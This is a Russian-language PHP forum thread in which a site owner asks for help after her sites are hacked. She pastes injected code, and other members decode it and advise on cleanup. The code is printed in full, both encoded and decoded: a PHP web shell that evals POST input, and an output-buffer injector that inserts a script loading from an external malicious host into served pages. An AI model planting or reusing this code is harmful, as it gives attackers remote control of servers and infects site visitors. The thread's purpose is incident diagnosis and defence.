Форум PHP

Последние 4 дня столкнулась с проблемой. Люди работающие под Линуксом стали присылать письма что сайт показывает красную табличку - "Сайт опасен для Вашего компьютера и т.д. ". В Wiindows всё работало нормально.
И Касперский лицензионный на моём компьютере молчит когда на сайт захожу.
Поэтому я сразу и не обратила на это внимание если бы не эти 2 письма.
Зашла на ФТП. Многие программы взломаны и там добавлен кусок кода вот такой (см ниже) и в папке с картинками присутствует чужой скрипт такого содержания (см. ниже):
Вычищала это всё. Сменила все пароли. Что это такое? Не мошенник ли взломал сайт? В линуксе эта табличка всё равно висит. Хотя кажется всё вычистила.
В Виндовсе её не было и нет Что это такое?
==================
Чужой скрипт:
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWw oYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXS kpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJ yk7'));?>
=============================
Посторонний код:
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZjNyJyk pe2Z1bmN0aW9uIGYzcigkcyl7aWYocHJlZ1 9tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L 3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNo KCRhWzBdYXMkdilpZihjb3VudChleHBsb2R lKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdG NoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXR jaCgnI1tcKFxbXShccypcZCssKXsyMCx9Iy csJHYpO2lmKChwcmVnX21hdGNoKCcjXGJld mFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2 LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN 0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKS kpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO 31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJh bWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHM sJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKH ByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqP VxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRp c3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiF zdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmV nX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW 1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsY WNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpj bWx3ZENCemNtTTlhSFIwY0RvdkwybHlZVzV 0YjJoaGJtUmxjeTVqYjIwdmMzRnNMM1JwYl dWZmJHbHVaUzV3YUhBZ1Bqd3ZjMk55YVhCM FBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigk cywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2U oJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLC RzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJ ykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0 aW9uIGYzcjIoJGEsJGIsJGMsJGQpe2dsb2J hbCRmM3IxOyRzPWFycmF5KCk7aWYoZnVuY3 Rpb25fZXhpc3RzKCRmM3IxKSljYWxsX3VzZ XJfZnVuYygkZjNyMSwkYSwkYiwkYywkZCk7 Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWF zJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZj NyJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ 3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1h cnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGh hbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y2 91bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9 jb250ZW50cygpO29iX2VuZF9jbGVhbigpO3 1vYl9zdGFydCgnZjNyJyk7Zm9yKCRpPTA7J Gk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0 KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV0 7fX19JGYzcmw9KCgkYT1Ac2V0X2Vycm9yX2 hhbmRsZXIoJ2YzcjInKSkhPSdmM3IyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9 QT1NUWydlJ10pKTs=')); ?>

Вообще совет вам такой дать хочу. Вы в первую очередь установите на свой компьютер какой нибудь Firewall. Он прикроет ваш компьютер от дырок. С ним ничего не страшно. И желательно по незнакомым сайтам не лазьте. Даже опытные программисты по незнакомым ссылкам особоне любят лазить. Имейте это ввиду. А если есть какая-то ценная информация на компьютере то сохраняйте на диск, флешку дополнительно и ставьте файлы на пароль.

А сейчас что мне делать? все 3 сайта с такм дерьмом. !!!
Trianon, SIM, Николай Вы где!!!????
"Спасайте меня ВСЕ!!!!"
http://www.spasi-i-sohrani.com/
http://iisus-hristos.com/
http://iisus-hristos.com/

Но почему я всё нормально вижу без этой таблички. А только при Линуксе такое выдаёт?

Поставить firewall, сменить FTP-пароли (хотя... может и не только), достать HTTP/FTP логи доступа и изучить. Исправить возможные дыры в безопасности скриптов.

Я меняла пароли 2 раза. Такие навернула что и не напишу теперь без шпаргалки. Скрипты вычистила.
Пароли меняла и на FTP и на почту и на панель управления.

Если Ваш компьютер заражен, то FTP-клиент просто сообщает тут же Ваши новые пароли заинтересованным принципалам.
Или браузер.
Или кем Вы там еще подключаетесь - почтовая программа, к примеру.

Я сегодня почти весь день мотался по городу.

Видимо, есть некоторый агент безопасности (файрволл, антивирус) в той линукс-системе, который не поддается этому трояну, а наоборот его обнаруживает и демонстрирует как вредноносный.
А эксплорер (или что там еще) - прогибается.

От этой картинки (см.аттач) у меня срывает шаблон.

=) получается не только взломали, залили шелл, так еще троянов все раздают..
странно.. мой kis2010 промолчал.. как же nix'ы умудряются? может только для них раздача?

Что такое ШЕЛЛ и куда его заливают? скаите пожалуйста я посмтрю.

Трианончик, миленький, что же теперь делать. Ну всё вычистила. !

Если Вы вычистили всё - радоваться.

Если же нет -
Не заходить на сайт браузером.
Менять пароли - все связанные с, плюс, вероятно, почтовый (участвовавший в регистрации).
Подключаться к сайту по FTP с гарантированно чистого компьютера.
Удалить всё скопом (поскольку Вы не разберете, что заражено, а что нет),
Залить гарантированно чистый сохраненный вариант сайта.

а еще верующий человек, как не стыдно ругаться? )
где же бог был в это время когда ваши сайты ломали?

Не подскажете где взять FireWall ? Ссылочку не пришлёте.

это шелл..
просите у хостеров логи.. вход в аккуант(панель), фтп-логи, логи вэб сервера.
по ним смотрите кто работал с этими файлами.. ищите, когда на них были запросы. сверяйте время. будет ясно откуда эти файлы взялись..

сам недавно с огромной атакой столкнулся.. написал небольшой скрипт на php , что-то вроде файрвола) не запускает неизвестные скрипты. тьфу-тьфу. щас все норм.

Так же почитайте инфу о Вашем ftp-клиенте. Некоторые имеют дыры.

<?php   eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWw oYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXS kpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJ yk7')); ?>

это:

<? if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found'); ?>

т.е. могу выполнить любой php-код передав его через форму.

интересно, самому можно выкл функции?)

ой спасибо. Но не совсем поняла что это делается. Объясните пожалуйста!!!! Буду безумно благодарна.!!!

<?      # есть супер глобал. переменная $_POST['e'] - $_POST передали с хтмл -формы.     if(isset($_POST['e']))     eval(base64_decode($_POST['e']));          #base64_decode - декодировать(раскодирвать) строку, закодированной через base64_encode      #eval - выполнить. строка будет соотв. php-коду          else # иначе     die('404 Not Found');      #die - завершить работу, и вывести строку ?>

там эти куски жуткого кода вписаны в мои нормальные скрипты. Врядли это постом сделано.

чтоб найти как сделали, я Вам выше писал..

а это что и как могут сделать.. с вашим сайтом.. т.е. все что захотят.

Что такое ШЕЛЛ и куда его заливают? скаите пожалуйста я посмтрю.

2ая часть

<?     if(!function_exists('f3r')){         function f3r($s){             if(preg_match_all('#<script(.*?)</script>#is',$s,$a))                 foreach($a[0]as$v)                     if(count(explode("\n",$v))>5){                     $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);                         if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))                         $s=str_replace($v,'',$s);                     }             if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))                              foreach($a[0]as$v)                     if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))                     $s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);                  $s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2lyYW5tb2h hbmRlcy5jb20vc3FsL3RpbWVfbGluZS5waH AgPjwvc2NyaXB0Pg=='),'',$s);                      if(stristr($s,'<body'))             $s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);             elseif(strpos($s,'<a'))             $s=$a.$s;              return$s;                  }         function f3r2($a,$b,$c,$d){         global $f3r1;         $s=array();             if(function_exists($f3r1))             call_user_func($f3r1,$a,$b,$c,$d);         foreach(@ob_get_status(1)as$v)             if(($a=$v['name'])=='f3r')             return;             elseif($a=='ob_gzhandler')             break;             else             $s[]=array($a=='default output handler'?false:$a);             for($i=count($s)-1;$i>=0;$i--){             $s[$i][1]=ob_get_contents();             ob_end_clean();             }         ob_start('f3r');             for($i=0;$i<count($s);$i++)    {                 ob_start($s[$i][0]);             echo $s[$i][1];             }         }     } $f3rl = (($a=@set_error_handler('f3r2'))!='f3r2') ? $a : 0; eval(base64_decode($_POST['e'])); ?>

я вот что подумал, может какая ошибка в коде, и он кишками наружу лезет.. а линукс реагирует на это? может как вариант быть?

нет. Ошибки нет. Сайты работают давно и нормально. В Гугле они занимают первые места. Тоже давно. И сейчас тоже. Я посмотрела. Добавились эти посторонние куски кода. Они чужие. Сейчас запустила проверку Касперским одного чужого скрипта. Он его проглатил. И ничего не сказал.
Чужой скрипт:
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWw oYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXS kpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJ yk7'));?>

нет... Вас ТОЧНО взломали..

меня путает, почему линуксы реагируют. они же видят только разметку, как винда.

вот если сам шелл наружу кишками лезет.. тогда понятно..

Потому что отклик сайта на $_POST[e] отличается от отклика без оного.
Потому что код <script src=http://iranmohandes.com/sql/time_line.php ></script> виден со стороны клиента. Не человеку, конечно.


Касательно ответа на вопрос в теме.
Нет.

Статья 273 Уголовного кодекса Российской Федерации - Создание, использование и распространение вредоносных программ для ЭВМ.

http://softtime.org/forum/read.php?id_forum=2&id_theme=1271&page=1
http://softtime.org/forum/read.php?id_forum=2&id_theme=1420&page=1

Народ скажите что такое ШЕЛЛ и куда его заливают. Я понятливая

Шелл - (в смысле текущей темы) набор инструментов, позволяющий его владельцу (шелла) удаленно выполнять команды операционной системы, читать, создавать, изменять файлы и каталоги на целевом компьютере (на сервере, и/или на домашнем компьютере жертвы.)

Заливают, куда смогут.

Шелл это чужой скрипт, который дает возможность управлять Вашим сайтом со стороны.
Я бы посоветовал первым делом, что бы не попасть под раздачу поисковиков, положить в корень сайта .htaccess такого содержания:

kyfiku;iyvrtxdikyr

То есть любой набор символов. Сервер ответит на запрос 500-й ошибкой. Поисковики на неё не отреагируют, придут позже. Но сайт работать пока не будет. Этим Вы выведете из под удара посетителей.
Ну и срочно принимать меры. Если есть чистый бэкап - сносить все к чертовой бабушке с сервера. Менять пароли изаливать по новой. Свой компьютер почистить, а лучшк с другого. Ну впрочем все уже сказали.

Если бэкапа нет - сложнее. Нужно искать жука. Станет совсем тяжко, аська в профиле.

>Менять пароли изаливать по новой.
>Свой компьютер почистить,

вот эти строки в неверном порядке.

На сайте сейчас посетители со 145 хостов сидят. .... Хоть плачь! Никто сегодня не жаловался. Спросила у знакомого - он в Линуксе работает - та же красная таблица. Я сменила все пароли. На базу забыла поменять. Сейчас поменяю. Если не поможет постучусь к Вам. Так и знала что гадости будут.

Дело в том, что Вы рискуете не только заразить пользователей, но и попасть в баню к поисковикам. Тогда вообще всех потеряете. 145 это не так много и если меры принять быстро, то никуда они не денутся.

Если безобразие продолжится, сайт лучше все таки закрыть ИМХО.

Сменила пароль на базу. Теперь все пароли новые сложные. Покопаюсь ещё. Может что пропустила. Сбивает с толку что Виндовс не ругается.

У Вашего знакомого может "ругаться" браузер, получив информацию об опасности с какого-то сайта, где Вас уже успели внести в чёрный список сайтов.

Каким фтп клиентом пользуетесь?

WinComander

Попробуйте FileZilla
Возможно заражена ваша машина и троян ворует пароли через фтп клиент или взломан хост где у вас находится сайт